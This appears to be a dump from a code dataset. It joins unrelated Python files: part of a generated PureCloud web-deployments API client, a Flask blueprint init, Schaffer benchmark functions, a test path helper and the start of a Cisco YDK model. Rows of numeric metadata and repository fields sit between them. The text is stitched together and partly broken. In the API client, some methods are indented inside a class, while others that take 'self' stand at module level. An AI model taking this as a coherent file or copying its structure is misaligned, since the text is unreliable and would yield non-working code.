        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'GET',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='WebDeploymentConfigurationVersion',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response
    def get_webdeployments_configurations(self, **kwargs):
        """
        View configuration drafts
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_webdeployments_configurations(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param bool show_only_published: Get only configuration drafts with published versions
        :return: WebDeploymentConfigurationVersionEntityListing
            If the method is called asynchronously,
            returns the request thread.
        """
        # Declared parameters plus the reserved 'callback' kwarg.
        all_params = ['show_only_published']
        all_params.append('callback')

        params = locals()
        # Fail fast on any keyword argument not declared above.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_webdeployments_configurations" % key
                )
            params[key] = val
        del params['kwargs']

        resource_path = '/api/v2/webdeployments/configurations'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        # Optional filter is passed as a query parameter, not a path segment.
        if 'show_only_published' in params:
            query_params['showOnlyPublished'] = params['show_only_published']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'GET',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='WebDeploymentConfigurationVersionEntityListing',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response
def get_webdeployments_deployment(self, deployment_id, **kwargs):
    """
    Get a deployment

    Runs synchronously unless a `callback` function is supplied, in which
    case the request is issued on a worker thread and that thread is
    returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_webdeployments_deployment(deployment_id, callback=callback_function)

    :param str deployment_id: The deployment ID (required)
    :param callback function: invoked with the result for an
        asynchronous request. (optional)
    :return: WebDeployment, or the request thread when a callback was supplied.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when `deployment_id` is None.
    """
    accepted_params = ['deployment_id', 'callback']
    for key in kwargs:
        if key not in accepted_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_webdeployments_deployment" % key
            )
    if deployment_id is None:
        raise ValueError("Missing the required parameter `deployment_id` when calling `get_webdeployments_deployment`")

    resource_path = '/api/v2/webdeployments/deployments/{deploymentId}'.replace('{format}', 'json')
    path_params = {'deploymentId': deployment_id}

    # Negotiate request/response content types; drop an empty Accept header.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    path_params,
                                    {},
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='WebDeployment',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=kwargs.get('callback'))
def get_webdeployments_deployments(self, **kwargs):
    """
    Get deployments

    Runs synchronously unless a `callback` function is supplied, in which
    case the request is issued on a worker thread and that thread is
    returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_webdeployments_deployments(callback=callback_function)

    :param callback function: invoked with the result for an
        asynchronous request. (optional)
    :return: WebDeploymentEntityListing, or the request thread when a
        callback was supplied.
    :raises TypeError: on an unrecognized keyword argument.
    """
    for key in kwargs:
        if key != 'callback':
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_webdeployments_deployments" % key
            )

    resource_path = '/api/v2/webdeployments/deployments'.replace('{format}', 'json')

    # Negotiate request/response content types; drop an empty Accept header.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'GET',
                                    {},
                                    {},
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='WebDeploymentEntityListing',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=kwargs.get('callback'))
def post_webdeployments_configuration_versions_draft_publish(self, configuration_id, **kwargs):
    """
    Publish the configuration draft and create a new version

    Runs synchronously unless a `callback` function is supplied, in which
    case the request is issued on a worker thread and that thread is
    returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.post_webdeployments_configuration_versions_draft_publish(configuration_id, callback=callback_function)

    :param str configuration_id: The configuration version ID (required)
    :param callback function: invoked with the result for an
        asynchronous request. (optional)
    :return: WebDeploymentConfigurationVersion, or the request thread when
        a callback was supplied.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when `configuration_id` is None.
    """
    accepted_params = ['configuration_id', 'callback']
    for key in kwargs:
        if key not in accepted_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_webdeployments_configuration_versions_draft_publish" % key
            )
    if configuration_id is None:
        raise ValueError("Missing the required parameter `configuration_id` when calling `post_webdeployments_configuration_versions_draft_publish`")

    resource_path = '/api/v2/webdeployments/configurations/{configurationId}/versions/draft/publish'.replace('{format}', 'json')
    path_params = {'configurationId': configuration_id}

    # Negotiate request/response content types; drop an empty Accept header.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    {},
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='WebDeploymentConfigurationVersion',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=kwargs.get('callback'))
def post_webdeployments_configurations(self, configuration_version, **kwargs):
    """
    Create a configuration draft

    Runs synchronously unless a `callback` function is supplied, in which
    case the request is issued on a worker thread and that thread is
    returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.post_webdeployments_configurations(configuration_version, callback=callback_function)

    :param WebDeploymentConfigurationVersion configuration_version: (required)
    :param callback function: invoked with the result for an
        asynchronous request. (optional)
    :return: WebDeploymentConfigurationVersion, or the request thread when
        a callback was supplied.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when `configuration_version` is None.
    """
    accepted_params = ['configuration_version', 'callback']
    for key in kwargs:
        if key not in accepted_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_webdeployments_configurations" % key
            )
    if configuration_version is None:
        raise ValueError("Missing the required parameter `configuration_version` when calling `post_webdeployments_configurations`")

    resource_path = '/api/v2/webdeployments/configurations'.replace('{format}', 'json')

    # Negotiate request/response content types; drop an empty Accept header.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    {},
                                    {},
                                    header_params,
                                    body=configuration_version,
                                    post_params=[],
                                    files={},
                                    response_type='WebDeploymentConfigurationVersion',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=kwargs.get('callback'))
def post_webdeployments_deployments(self, deployment, **kwargs):
    """
    Create a deployment

    Runs synchronously unless a `callback` function is supplied, in which
    case the request is issued on a worker thread and that thread is
    returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.post_webdeployments_deployments(deployment, callback=callback_function)

    :param WebDeployment deployment: (required)
    :param callback function: invoked with the result for an
        asynchronous request. (optional)
    :return: WebDeployment, or the request thread when a callback was supplied.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when `deployment` is None.
    """
    accepted_params = ['deployment', 'callback']
    for key in kwargs:
        if key not in accepted_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method post_webdeployments_deployments" % key
            )
    if deployment is None:
        raise ValueError("Missing the required parameter `deployment` when calling `post_webdeployments_deployments`")

    resource_path = '/api/v2/webdeployments/deployments'.replace('{format}', 'json')

    # Negotiate request/response content types; drop an empty Accept header.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    {},
                                    {},
                                    header_params,
                                    body=deployment,
                                    post_params=[],
                                    files={},
                                    response_type='WebDeployment',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=kwargs.get('callback'))
def put_webdeployments_configuration_versions_draft(self, configuration_id, configuration_version, **kwargs):
    """
    Update the configuration draft

    Runs synchronously unless a `callback` function is supplied, in which
    case the request is issued on a worker thread and that thread is
    returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.put_webdeployments_configuration_versions_draft(configuration_id, configuration_version, callback=callback_function)

    :param str configuration_id: The configuration version ID (required)
    :param WebDeploymentConfigurationVersion configuration_version: (required)
    :param callback function: invoked with the result for an
        asynchronous request. (optional)
    :return: WebDeploymentConfigurationVersion, or the request thread when
        a callback was supplied.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when a required parameter is None.
    """
    accepted_params = ['configuration_id', 'configuration_version', 'callback']
    for key in kwargs:
        if key not in accepted_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method put_webdeployments_configuration_versions_draft" % key
            )
    if configuration_id is None:
        raise ValueError("Missing the required parameter `configuration_id` when calling `put_webdeployments_configuration_versions_draft`")
    if configuration_version is None:
        raise ValueError("Missing the required parameter `configuration_version` when calling `put_webdeployments_configuration_versions_draft`")

    resource_path = '/api/v2/webdeployments/configurations/{configurationId}/versions/draft'.replace('{format}', 'json')
    path_params = {'configurationId': configuration_id}

    # Negotiate request/response content types; drop an empty Accept header.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    {},
                                    header_params,
                                    body=configuration_version,
                                    post_params=[],
                                    files={},
                                    response_type='WebDeploymentConfigurationVersion',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=kwargs.get('callback'))
def put_webdeployments_deployment(self, deployment_id, deployment, **kwargs):
    """
    Update a deployment

    Runs synchronously unless a `callback` function is supplied, in which
    case the request is issued on a worker thread and that thread is
    returned.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.put_webdeployments_deployment(deployment_id, deployment, callback=callback_function)

    :param str deployment_id: The deployment ID (required)
    :param WebDeployment deployment: (required)
    :param callback function: invoked with the result for an
        asynchronous request. (optional)
    :return: WebDeployment, or the request thread when a callback was supplied.
    :raises TypeError: on an unrecognized keyword argument.
    :raises ValueError: when a required parameter is None.
    """
    accepted_params = ['deployment_id', 'deployment', 'callback']
    for key in kwargs:
        if key not in accepted_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method put_webdeployments_deployment" % key
            )
    if deployment_id is None:
        raise ValueError("Missing the required parameter `deployment_id` when calling `put_webdeployments_deployment`")
    if deployment is None:
        raise ValueError("Missing the required parameter `deployment` when calling `put_webdeployments_deployment`")

    resource_path = '/api/v2/webdeployments/deployments/{deploymentId}'.replace('{format}', 'json')
    path_params = {'deploymentId': deployment_id}

    # Negotiate request/response content types; drop an empty Accept header.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'PUT',
                                    path_params,
                                    {},
                                    header_params,
                                    body=deployment,
                                    post_params=[],
                                    files={},
                                    response_type='WebDeployment',
                                    auth_settings=['PureCloud OAuth'],
                                    callback=kwargs.get('callback'))
| 40.10084
| 153
| 0.567128
| 3,957
| 42,948
| 5.949962
| 0.053323
| 0.039755
| 0.023191
| 0.020982
| 0.917771
| 0.908087
| 0.893858
| 0.884004
| 0.878228
| 0.87088
| 0
| 0.000939
| 0.35557
| 42,948
| 1,070
| 154
| 40.138318
| 0.849731
| 0.25929
| 0
| 0.845045
| 0
| 0
| 0.21368
| 0.076445
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025225
| false
| 0
| 0.012613
| 0
| 0.063063
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53d84e701658fdae265dfca874e495599929a238
| 115
|
py
|
Python
|
app/routes/yesterday/__init__.py
|
ygorazambuja/covid-scrapper
|
6c714a47c00773fe0391d040dcfed57258d98c07
|
[
"MIT"
] | 7
|
2020-03-28T03:50:07.000Z
|
2020-09-30T02:49:10.000Z
|
app/routes/yesterday/__init__.py
|
ygorazambuja/covid-scrapper
|
6c714a47c00773fe0391d040dcfed57258d98c07
|
[
"MIT"
] | 2
|
2020-03-28T03:27:18.000Z
|
2020-11-03T01:37:39.000Z
|
app/routes/yesterday/__init__.py
|
ygorazambuja/covid-scrapper
|
6c714a47c00773fe0391d040dcfed57258d98c07
|
[
"MIT"
] | null | null | null |
# Blueprint for the "yesterday" route group; the application factory is
# expected to register this blueprint elsewhere.
from flask import Blueprint

yesterday_blueprint = Blueprint('yesterday_blueprint', __name__)

# Imported at the bottom (after the blueprint exists) so that the views
# module can `from . import yesterday_blueprint` without a circular import.
from . import views
| 19.166667
| 64
| 0.817391
| 13
| 115
| 6.769231
| 0.538462
| 0.409091
| 0.613636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121739
| 115
| 5
| 65
| 23
| 0.871287
| 0
| 0
| 0
| 0
| 0
| 0.165217
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
53f379e8d81f38631284718794ef655bee8b5d9e
| 7,342
|
py
|
Python
|
NiaPy/benchmarks/schaffer.py
|
lukapecnik/NiaPy
|
a40ac08a4c06a13019ec5e39cc137461884928b0
|
[
"MIT"
] | 1
|
2020-03-16T11:15:43.000Z
|
2020-03-16T11:15:43.000Z
|
NiaPy/benchmarks/schaffer.py
|
lukapecnik/NiaPy
|
a40ac08a4c06a13019ec5e39cc137461884928b0
|
[
"MIT"
] | null | null | null |
NiaPy/benchmarks/schaffer.py
|
lukapecnik/NiaPy
|
a40ac08a4c06a13019ec5e39cc137461884928b0
|
[
"MIT"
] | 1
|
2020-03-25T16:20:36.000Z
|
2020-03-25T16:20:36.000Z
|
# encoding=utf8
"""Implementations of Schaffer benchmarks."""
from math import sin, cos, sqrt
from NiaPy.benchmarks.benchmark import Benchmark
__all__ = ["SchafferN2", "SchafferN4", "ExpandedSchaffer"]
class SchafferN2(Benchmark):
    r"""Implementation of the Schaffer N. 2 function.

    Date: 2018

    Author: Klemen Berkovič

    License: MIT

    Function: **Schaffer N. 2 Function**

        :math:`f(\textbf{x}) = 0.5 + \frac{ \sin^2 \left( x_1^2 - x_2^2 \right) - 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }`

        **Input domain:**
        The function can be defined on any input domain but it is usually
        evaluated on the hypercube :math:`x_i ∈ [-100, 100]`, for all :math:`i = 1, 2,..., D`.

        **Global minimum:** :math:`f(x^*) = 0`, at :math:`x^* = (0, 0)`

    LaTeX formats:
        Inline:
            $f(\textbf{x}) = 0.5 + \frac{ \sin^2 \left( x_1^2 - x_2^2 \right) - 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }$

        Equation:
            \begin{equation} f(\textbf{x}) = 0.5 + \frac{ \sin^2 \left( x_1^2 - x_2^2 \right) - 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 } \end{equation}

        Domain:
            $-100 \leq x_i \leq 100$

    Reference:
        http://www5.zzu.edu.cn/__local/A/69/BC/D3B5DFE94CD2574B38AD7CD1D12_C802DAFE_BC0C0.pdf
    """

    Name = ["SchafferN2"]

    def __init__(self, Lower=-100.0, Upper=100.0):
        r"""Initialize Schaffer N. 2 benchmark.

        Args:
            Lower (Optional[float]): Lower bound of problem.
            Upper (Optional[float]): Upper bound of problem.

        See Also:
            :func:`NiaPy.benchmarks.Benchmark.__init__`
        """
        Benchmark.__init__(self, Lower, Upper)

    @staticmethod
    def latex_code():
        """Return the latex code of the problem.

        Returns:
            [str] -- latex code.
        """
        return r"""$f(\textbf{x}) = 0.5 + \frac{ \sin^2 \left( x_1^2 - x_2^2 \right) - 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }$"""

    @classmethod
    def function(cls):
        """Return benchmark evaluation function.

        Returns:
            [fun] -- Evaluation function.
        """
        # The function is defined on the first two coordinates only; D is
        # accepted for interface uniformity with the other benchmarks.
        def evaluate(D, sol):
            return 0.5 + (sin(sol[0] ** 2 - sol[1] ** 2) ** 2 - 0.5) / (1 + 0.001 * (sol[0] ** 2 + sol[1] ** 2)) ** 2
        return evaluate
class SchafferN4(Benchmark):
    r"""Implementation of the Schaffer N. 4 function.

    Date: 2018

    Author: Klemen Berkovič

    License: MIT

    Function: **Schaffer N. 4 Function**

        :math:`f(\textbf{x}) = 0.5 + \frac{ \cos^2 \left( \sin \left( x_1^2 - x_2^2 \right) \right)- 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }`

        **Input domain:**
        The function can be defined on any input domain but it is usually
        evaluated on the hypercube :math:`x_i ∈ [-100, 100]`, for all :math:`i = 1, 2,..., D`.

        **Global minimum:** :math:`f(x^*) \approx 0.292579`, at :math:`x^* = (0, \pm 1.25313)`

    LaTeX formats:
        Inline:
            $f(\textbf{x}) = 0.5 + \frac{ \cos^2 \left( \sin \left( x_1^2 - x_2^2 \right) \right)- 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }$

        Equation:
            \begin{equation} f(\textbf{x}) = 0.5 + \frac{ \cos^2 \left( \sin \left( x_1^2 - x_2^2 \right) \right)- 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 } \end{equation}

        Domain:
            $-100 \leq x_i \leq 100$

    Reference:
        http://www5.zzu.edu.cn/__local/A/69/BC/D3B5DFE94CD2574B38AD7CD1D12_C802DAFE_BC0C0.pdf
    """

    Name = ["SchafferN4"]

    def __init__(self, Lower=-100.0, Upper=100.0):
        r"""Initialize Schaffer N. 4 benchmark.

        Args:
            Lower (Optional[float]): Lower bound of problem.
            Upper (Optional[float]): Upper bound of problem.

        See Also:
            :func:`NiaPy.benchmarks.Benchmark.__init__`
        """
        Benchmark.__init__(self, Lower, Upper)

    @staticmethod
    def latex_code():
        """Return the latex code of the problem.

        Returns:
            [str] -- latex code.
        """
        return r"""$f(\textbf{x}) = 0.5 + \frac{ \cos^2 \left( \sin \left( x_1^2 - x_2^2 \right) \right)- 0.5 }{ \left( 1 + 0.001 \left( x_1^2 + x_2^2 \right) \right)^2 }$"""

    @classmethod
    def function(cls):
        """Return benchmark evaluation function.

        Returns:
            [fun] -- Evaluation function.
        """
        # The function is defined on the first two coordinates only; D is
        # accepted for interface uniformity with the other benchmarks.
        def evaluate(D, sol):
            return 0.5 + (cos(sin(sol[0] ** 2 - sol[1] ** 2)) ** 2 - 0.5) / (1 + 0.001 * (sol[0] ** 2 + sol[1] ** 2)) ** 2
        return evaluate
class ExpandedSchaffer(Benchmark):
    r"""Implementation of the Expanded Schaffer function.

    Date: 2018

    Author: Klemen Berkovič

    License: MIT

    Function: **Expanded Schaffer Function**

        :math:`f(\textbf{x}) = g(x_D, x_1) + \sum_{i=2}^D g(x_{i - 1}, x_i) \\ g(x, y) = 0.5 + \frac{\sin \left(\sqrt{x^2 + y^2} \right)^2 - 0.5}{\left( 1 + 0.001 (x^2 + y^2) \right)}^2`

        **Input domain:**
        The function can be defined on any input domain but it is usually
        evaluated on the hypercube :math:`x_i ∈ [-100, 100]`, for all :math:`i = 1, 2,..., D`.

        **Global minimum:** :math:`f(x^*) = 0`, at :math:`x^* = (0,...,0)`

    LaTeX formats:
        Inline:
            $f(\textbf{x}) = g(x_D, x_1) + \sum_{i=2}^D g(x_{i - 1}, x_i) \\ g(x, y) = 0.5 + \frac{\sin \left(\sqrt{x^2 + y^2} \right)^2 - 0.5}{\left( 1 + 0.001 (x^2 + y^2) \right)}^2$

        Equation:
            \begin{equation} f(\textbf{x}) = g(x_D, x_1) + \sum_{i=2}^D g(x_{i - 1}, x_i) \\ g(x, y) = 0.5 + \frac{\sin \left(\sqrt{x^2 + y^2} \right)^2 - 0.5}{\left( 1 + 0.001 (x^2 + y^2) \right)}^2 \end{equation}

        Domain:
            $-100 \leq x_i \leq 100$

    Reference:
        http://www5.zzu.edu.cn/__local/A/69/BC/D3B5DFE94CD2574B38AD7CD1D12_C802DAFE_BC0C0.pdf
    """

    Name = ["ExpandedSchaffer"]

    def __init__(self, Lower=-100.0, Upper=100.0):
        r"""Initialize Expanded Schaffer benchmark.

        Args:
            Lower (Optional[float]): Lower bound of problem.
            Upper (Optional[float]): Upper bound of problem.

        See Also:
            :func:`NiaPy.benchmarks.Benchmark.__init__`
        """
        Benchmark.__init__(self, Lower, Upper)

    @staticmethod
    def latex_code():
        """Return the latex code of the problem.

        Returns:
            [str] -- latex code.
        """
        return r"""$f(\textbf{x}) = g(x_D, x_1) + \sum_{i=2}^D g(x_{i - 1}, x_i) \\ g(x, y) = 0.5 + \frac{\sin \left(\sqrt{x^2 + y^2} \right)^2 - 0.5}{\left( 1 + 0.001 (x^2 + y^2) \right)}^2$"""

    @classmethod
    def function(cls):
        """Return benchmark evaluation function.

        Returns:
            [fun] -- Evaluation function.
        """
        # Pairwise Schaffer term applied around the ring of coordinates.
        def g(x, y):
            return 0.5 + (sin(sqrt(x ** 2 + y ** 2)) ** 2 - 0.5) / (1 + 0.001 * (x ** 2 + y ** 2)) ** 2
        def evaluate(D, sol):
            val = 0.0
            # Sum g over consecutive pairs, then close the ring with (x_D, x_1).
            for i in range(1, D):
                val += g(sol[i - 1], sol[i])
            return g(sol[D - 1], sol[0]) + val
        return evaluate
| 30.213992
| 218
| 0.528466
| 1,090
| 7,342
| 3.458716
| 0.110092
| 0.015915
| 0.025464
| 0.029708
| 0.892042
| 0.886737
| 0.867639
| 0.864191
| 0.852255
| 0.837666
| 0
| 0.09512
| 0.288341
| 7,342
| 242
| 219
| 30.338843
| 0.625837
| 0.618769
| 0
| 0.48
| 0
| 0.06
| 0.241913
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.26
| false
| 0
| 0.04
| 0.06
| 0.62
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
54fcf7b7e772c8ddb0c5489080d6c9e01977dafd
| 220
|
py
|
Python
|
src/recording_script_generator/core/selection/__init__.py
|
stefantaubert/recording-script-generator
|
01cdcd4b85ed7f245f4bb8535d870c04472746c9
|
[
"MIT"
] | null | null | null |
src/recording_script_generator/core/selection/__init__.py
|
stefantaubert/recording-script-generator
|
01cdcd4b85ed7f245f4bb8535d870c04472746c9
|
[
"MIT"
] | null | null | null |
src/recording_script_generator/core/selection/__init__.py
|
stefantaubert/recording-script-generator
|
01cdcd4b85ed7f245f4bb8535d870c04472746c9
|
[
"MIT"
] | null | null | null |
from recording_script_generator.core.selection.detection import *
from recording_script_generator.core.selection.modify import (
add_to_selection_inplace, remove_from_selection_inplace,
select_selection_inplace)
| 44
| 65
| 0.863636
| 27
| 220
| 6.592593
| 0.518519
| 0.269663
| 0.213483
| 0.314607
| 0.460674
| 0.460674
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086364
| 220
| 4
| 66
| 55
| 0.885572
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
074481682d519769c4063b41fd4b09a0f8dc104a
| 219
|
py
|
Python
|
tests/context.py
|
davidkwast/space_cube
|
63e8c26245234e6151e73cceb55cbd701e501c3c
|
[
"MIT"
] | null | null | null |
tests/context.py
|
davidkwast/space_cube
|
63e8c26245234e6151e73cceb55cbd701e501c3c
|
[
"MIT"
] | null | null | null |
tests/context.py
|
davidkwast/space_cube
|
63e8c26245234e6151e73cceb55cbd701e501c3c
|
[
"MIT"
] | 1
|
2019-08-08T01:50:52.000Z
|
2019-08-08T01:50:52.000Z
|
# Test helper: makes the project root importable from the tests directory.
import os
import sys

print()

# Prepend the repository root (one level above this file) to sys.path so the
# tests import the local sources rather than any installed copy.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),'..')))
# sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),'../game')))
# NOTE(review): the print() calls look like leftover debug output — confirm
# they are intentional before removing.
print(sys.path)
| 21.9
| 88
| 0.703196
| 37
| 219
| 3.945946
| 0.324324
| 0.246575
| 0.164384
| 0.191781
| 0.739726
| 0.739726
| 0.739726
| 0.739726
| 0.739726
| 0.739726
| 0
| 0.009756
| 0.063927
| 219
| 9
| 89
| 24.333333
| 0.702439
| 0.392694
| 0
| 0
| 0
| 0
| 0.015267
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0.4
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
0747e7ffdfee3af099a0ae9f61557a96426dd7d7
| 121,791
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_objmgr_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_objmgr_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_infra_objmgr_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XR_infra_objmgr_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR infra\-objmgr package operational data.
This module contains definitions
for the following management objects\:
object\-group\: Object\-group operational data
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class EndPort(Enum):
    """
    EndPort (Enum Class)

    End port

    Maps well-known TCP/IP service names to their port numbers; used as the
    end of a port range in object-group operational data.

    .. data:: echo = 7
        Echo (7)
    .. data:: discard = 9
        Discard (9)
    .. data:: daytime = 13
        Daytime (13)
    .. data:: chargen = 19
        Character generator (19)
    .. data:: ftp_data = 20
